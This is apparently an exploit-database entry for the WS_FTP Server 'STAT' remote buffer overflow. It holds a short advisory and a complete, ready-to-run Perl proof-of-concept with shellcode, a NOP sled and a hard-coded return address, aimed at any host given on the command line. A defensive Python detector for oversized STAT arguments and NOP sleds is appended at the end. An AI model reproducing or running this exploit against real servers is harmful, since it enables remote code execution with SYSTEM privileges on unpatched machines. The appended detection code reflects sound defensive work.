Ipswitch WS_FTP Server 1.0.x/2.0.x – ‘STAT’ Remote Buffer Overflow

Vulnerability ID: 1053558    Vulnerability type:
Published: 2001-11-05    Updated: 2001-11-05
CVE number: N/A
CNNVD-ID: N/A
Platform: Windows    CVSS score: N/A
|Source
https://www.exploit-db.com/exploits/21142
|Details
Vulnerability details have not yet been disclosed.
|Exploit
source: http://www.securityfocus.com/bid/3507/info

WS_FTP Server, a popular FTP server for Microsoft Windows platforms, is vulnerable to a buffer overflow when a user submits a specially crafted but otherwise legitimate FTP command. By default, WS_FTP Server runs as a SYSTEM service.

If a logged-in user submits a 'STAT' command followed by arbitrary data (approximately 479 bytes) to a host running WS_FTP Server, stack variables, including the saved return address, can be overwritten, potentially allowing execution of arbitrary code with SYSTEM privileges.

#########################################################################
#
# WS_FTP Server 2.0.3 STAT proof-of-concept exploit
# By [email protected] (C)2001
#
# 
# There are a couple of things screwing up this exploit. First, the
# total number of bytes we control in the area where ESP is pointing
# corresponds to the number of bytes in the domain name. So, to make sure
# it works on as many systems as possible, I'm only using 2 bytes here.
# So, we have to jump back through the buffer... Fun.. :)
# Second, the number of bytes needed to overwrite EIP is dependent on the
# number of bytes in the server name.
# Third, the stack has to be moved to the heap, because there is no
# good place on the stack; it just ends with CreateFile overwriting stuff.
#
# I'm using a "jump esp" in shlwapi.dll (0x70beed87) as the return address;
# change this if it does not work on your system.
#
#########################################################################
$login="ftp";	#username
$pass="ftp";	#password
#########################################################################
$ARGC=@ARGV;
if ($ARGC !=1) {
	print "WS_FTP server 2.0.3 STAT proof-of-concept exploit\n";
	print "It creates a file named defcom.iyd in the c-root\n";
	print "(C)2001 [email protected]\n";
	print "Usage: $0 <host>\n";
	print "Example: $0 127.0.0.1\n";
	exit;
}
use Socket;

my($remote,$port,$iaddr,$paddr,$proto);
$remote=$ARGV[0];
$port = "21";

$iaddr = inet_aton($remote) or die "Error: $!";
$paddr = sockaddr_in($port, $iaddr) or die "Error: $!";
$proto = getprotobyname('tcp') or die "Error: $!";

socket(SOCK, PF_INET, SOCK_STREAM, $proto) or die "Error: $!";
connect(SOCK, $paddr) or die "Error: $!";
###########################################################################################
# get servername and length of domain (the banner is expected to start "220-<servername>")
recv(SOCK,$reply,1024,0);
@split1 = split(/ /,$reply);
@split2 = split(/-/,$split1[0]);
$servername = $split2[1];
$pos = index($servername,".");
if ($pos == -1) { print "Error: Domain has to be at least two characters\n"; exit; }
$domain = substr($servername,$pos);
if (length($domain) < 2) { print "Error: Domain has to be at least two characters\n"; exit; }
###########################################################################################

sleep(1);
$msg = "user $login\n";
send(SOCK, $msg, 0) or die "Cannot send query: $!";
$msg = "pass $pass\n";
sleep(1);
send(SOCK, $msg, 0) or die "Cannot send query: $!";
# shellcode
$sploit="\xeb\x03\x5a\xeb\x05\xe8\xf8\xff\xff\xff\x8b\xc2\x83\xc0\x1a\xeb\x02\xeb\x80\x33";
$sploit = $sploit . "\xc9\x66\xb9\xd6\x80\x66\x81\xf1\x80\x80\x80\x30\x99\x40\xe2\xfa\x12";
$sploit = $sploit . "\x7b\x1a\x75\x92\x12\x75\xcb\xf1\x99\x63\x99\x99\xf1\xd9\x99\x99\x99";
$sploit = $sploit . "\x27\x45\x8d\xdc\x99\x66\x8f\xc3\x9c\x99\x63\x99\x99\x12\x79\x12\x75";
$sploit = $sploit . "\xaa\x59\xf1\x19\x99\x99\x99\xf3\x9b\xc9\xc9\xf1\x99\x99\x99\x89\x1a";
$sploit = $sploit . "\x5b\xfb\xcb\x27\xbd\x8c\xdc\x99\x66\x8f\xaa\x59\xc9\x27\x89\x8f\xdc";
$sploit = $sploit . "\x99\x66\x8f\xfa\xa3\xc5\xfd\xfc\xff\xfa\xf6\xf4\xb7\xf0\xe0\xfd\x99";
# STAT argument: NOP sled sized from the server name, the shellcode, the
# "jmp esp" address (0x70beed87, little-endian), 16 NOPs, then a short
# backward jump into the buffer.
$msg = "stat " . "\x90" x (480-length($sploit)-length($servername)) . $sploit . "\x87\xed\xbe\x70" . "\x90" x 16 . "\xeb\x81" . "\r\n";
print $msg;
sleep(1);
send(SOCK, $msg, 0) or die "Cannot send query: $!";
sleep(1);
exit;
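Detection logic for the condition described above, written here as an added example and not part of the original advisory or proof-of-concept: it inspects client-to-server FTP command lines and flags STAT arguments that are oversized (the 256-byte alert threshold is an assumed, tunable value set below the ~479-byte figure) or that carry a run of 0x90 NOP bytes; the sample session is constructed.

```python
"""Flag FTP STAT commands shaped like the WS_FTP Server STAT overflow:
an oversized argument, or an 0x90 NOP sled inside the argument."""
from typing import List, Optional

# Bugtraq puts the overflow at roughly 479 bytes of STAT argument; alert
# well below that (assumed threshold) so shorter probing is surfaced too.
STAT_ARG_ALERT_LEN = 256
# Legitimate STAT arguments are paths; a run of 16+ 0x90 bytes is a sled.
NOP_RUN_MIN = 16


def inspect_ftp_command(line: bytes) -> Optional[str]:
    """Return a reason string if `line` is a suspicious STAT command, else None.

    `line` is one raw command line as sent by the client, CRLF already
    stripped. The verb is upper-cased because the PoC sends "stat" in
    lower case and FTP servers accept either.
    """
    verb, _, arg = line.partition(b" ")
    if verb.upper() != b"STAT":
        return None
    if len(arg) >= STAT_ARG_ALERT_LEN:
        return f"oversized STAT argument ({len(arg)} bytes)"
    if b"\x90" * NOP_RUN_MIN in arg:
        return f"NOP sled in STAT argument ({len(arg)} bytes)"
    return None


def scan_session(lines: List[bytes]) -> List[str]:
    """Run inspect_ftp_command over a whole session and collect the hits."""
    return [r for r in map(inspect_ftp_command, lines) if r is not None]


# Constructed sample session: a normal login and STAT, then two requests
# shaped like the exploit above (479 bytes matches the advisory's figure).
SAMPLE_SESSION = [
    b"USER ftp",
    b"PASS ftp",
    b"STAT",
    b"STAT /pub/incoming",
    b"stat " + b"A" * 479,                 # oversized argument
    b"stat " + b"\x90" * 32 + b"B" * 100,  # short sled, under the length cap
]

if __name__ == "__main__":
    for hit in scan_session(SAMPLE_SESSION):
        print(hit)
```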
